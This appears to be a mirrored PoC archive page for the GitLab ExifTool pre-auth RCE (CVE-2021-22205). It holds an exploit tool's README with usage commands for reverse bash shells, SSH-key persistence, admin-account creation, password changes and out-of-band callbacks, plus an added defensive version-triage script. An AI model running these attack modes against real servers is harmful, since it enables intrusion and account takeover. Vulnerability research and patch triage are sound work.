POC details: 1879976ce381cc9f267707936bc0c133c31bb7d7

Source
Associated vulnerability
Title: GitLab code injection vulnerability (CVE-2021-22205)
Description: GitLab is an open-source end-to-end software development platform from the US company GitLab, with built-in version control, issue tracking, code review, CI/CD (continuous integration and continuous delivery) and other features. GitLab Community Edition has a code injection vulnerability caused by incorrect input validation in the image parser when it processes image files. The following products and versions are affected: Gitlab Community Edition: 11.9.0, 11.9.1, 11.9.2, 11.9.3, 11.9.4, 11.9.5, 11.9.6, 11.9.7, 11.9.8, 11.9.9, 11
Description
GitLab CE/EE Preauth RCE using ExifTool
Introduction
# CVE-2021-22205

GitLab CE/EE Preauth RCE using ExifTool

*This project is for learning only. If someone's rights have been violated, please contact me to remove the project. Finally, **DO NOT USE IT ILLEGALLY**: if you engage in any illegal behavior while using this tool, you bear all the consequences yourself. The developers and contributors of this tool do not bear any legal or joint liability.*

## Description

An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.

Affected versions:

- \>=11.9, <13.8.8
- \>=13.9, <13.9.6
- \>=13.10, <13.10.3
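The three ranges above are easy to misread when triaging an inventory by hand (13.8.8 is the first fixed version of the 13.8 branch, 13.9.6 of 13.9, and so on). The following defensive example, added here and not part of the PoC repository, encodes the README's ranges as half-open intervals and classifies GitLab version strings of the form GitLab itself reports (for example `13.10.2-ee`, as shown in the Admin Area or returned by the authenticated `/api/v4/version` endpoint). The edition suffix handling and the sample inventory are assumptions constructed for the example.

```python
"""Classify GitLab version strings against the CVE-2021-22205 affected ranges.

Added defensive example, not the PoC project's own code. The ranges are the
ones listed in the README:
    >=11.9,  <13.8.8
    >=13.9,  <13.9.6
    >=13.10, <13.10.3
"""
import re

# (lower bound inclusive, upper bound exclusive) as (major, minor, patch)
AFFECTED_RANGES = [
    ((11, 9, 0), (13, 8, 8)),
    ((13, 9, 0), (13, 9, 6)),
    ((13, 10, 0), (13, 10, 3)),
]

# Accepts an optional leading "v", a required major.minor and an optional
# patch; anything after that (e.g. "-ee", "-ce", "-rc1") is ignored.
_VERSION_RE = re.compile(r"^\s*v?(\d+)\.(\d+)(?:\.(\d+))?")


def parse_version(text: str) -> tuple:
    """Turn '13.10.2-ee' / 'v13.9' / '13.8.8' into a (major, minor, patch) tuple.

    A missing patch component is treated as 0 so that a bare '13.9' is
    compared as 13.9.0. Unrecognised input raises ValueError rather than
    silently being classified as safe.
    """
    m = _VERSION_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised GitLab version string: {text!r}")
    major, minor, patch = m.group(1), m.group(2), m.group(3) or "0"
    return (int(major), int(minor), int(patch))


def is_affected(version: str) -> bool:
    """True if the version falls inside any affected range (tuple comparison)."""
    v = parse_version(version)
    return any(lo <= v < hi for lo, hi in AFFECTED_RANGES)


def triage(inventory: dict) -> dict:
    """Map host -> version string to host -> 'affected' / 'not affected' / 'unknown'.

    Unparseable versions are reported as 'unknown' so they get a manual look
    instead of disappearing from the list.
    """
    result = {}
    for host, ver in inventory.items():
        try:
            result[host] = "affected" if is_affected(ver) else "not affected"
        except ValueError:
            result[host] = "unknown"
    return result


if __name__ == "__main__":
    # Constructed sample inventory (hypothetical hosts, not real systems).
    sample = {
        "git-old.example.test": "12.4.0-ce",     # inside the first range
        "git-a.example.test": "13.8.7-ee",       # last vulnerable 13.8.x
        "git-b.example.test": "13.8.8-ee",       # first fixed 13.8.x
        "git-c.example.test": "13.10.2-ce",      # inside the third range
        "git-d.example.test": "13.10.3-ce",      # first fixed 13.10.x
        "git-new.example.test": "14.0.0-ee",     # never affected
        "git-odd.example.test": "unknown-build", # unparseable
    }
    for host, status in triage(sample).items():
        print(f"{host:22} {sample[host]:14} {status}")
```

Versions below 11.9 are reported as not affected because the README's ranges start at 11.9; if you also track the end-of-life 13.8 and 13.9 branches, the fixed patch versions are the exclusive upper bounds above.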

## Features

- Gitlab version detection through the hash in Webpack manifest.json
- Automatic out-of-band interactions with DNSLog & ~~PostBin~~ **RequestBin**
- Support Reverse Bash Shell / Append SSH Key to authorized_keys
- Support ENTER to modify and restore gitlab user password

## Usage

```bash
🐚 ››› python CVE-2021-22205.py

      ░░░░▐▐░░░  CVE-2021-22205
 ▐  ░░░░░▄██▄▄  GitLab CE/EE Unauthenticated RCE using ExifTool
  ▀▀██████▀░░  Affecting all versions starting from 11.9
  ░░▐▐░░▐▐░░  security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild
 ▒▒▒▐▐▒▒▐▐▒  github.com/inspiringz/CVE-2021-22205

Usage:
    python3 CVE-2021-22205.py -u site_url -m detect        # gitlab version & vuln detect
    python3 CVE-2021-22205.py -u site_url -m rce1 'id'     # rce (echo via requestbin oob) 
    python3 CVE-2021-22205.py -u site_url -m rce2 'id'     # rce (echo via write file) *
    python3 CVE-2021-22205.py -u site_url -m rev ip port   # reverse bash shell
    python3 CVE-2021-22205.py -u site_url -m ssh git/root  # append ssh authorized_keys
    python3 CVE-2021-22205.py -u site_url -m add user pass # add manager account *
    python3 CVE-2021-22205.py -u site_url -m mod user      # modify specified user's password => P4ss@GitLab
    python3 CVE-2021-22205.py -u site_url -m rec user      # restore specified user's original password
```

- The `site_url` parameter format is http[s]://<domain|ip>[:port]/, for example: https://example.com:9000/
- Methods marked with `*` (rce2, add) are unstable and may not work :(
- You can modify the script content according to the actual environment

## Screenshot

Detect:

![image-20220116233646585](images/image-20220116233646585.png)

RCE(Echo via RequestBin OOB):

![image-20220116234003576](images/image-20220116234003576.png)

Reverse Bash Shell:

![image-20211111131442470](images/image-20211111131442470.png)

Append SSH Key to authorized_keys:

![image-20211111133555010](images/image-20211111133555010.png)

Gitlab user password modification and restoration:

![image-20211111132115090](images/image-20211111132115090.png)

## Reference

- https://github.com/projectdiscovery/nuclei-templates/blob/637eec3efac6eb384742c7aaa4e7d14f3392ede9/cves/2021/CVE-2021-22205.yaml
- https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22205.json
- https://github.com/righel/gitlab-version-nse
File snapshot

```
[4.0K] /data/pocs/1879976ce381cc9f267707936bc0c133c31bb7d7
├── [ 54K] CVE-2021-22205.py
├── [4.0K] images
│   ├── [216K] image-20211111131442470.png
│   ├── [509K] image-20211111132115090.png
│   ├── [649K] image-20211111133555010.png
│   ├── [169K] image-20220116233646585.png
│   └── [372K] image-20220116234003576.png
└── [3.1K] README.md

1 directory, 7 files
```

Cached for you by the Shenlong bot
Notes
    1. Accessing the original source is recommended.
    2. If the source is no longer available or cannot be accessed, send an email to f.jinxu#gmail.com to request a local snapshot (replace # with @).
    3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.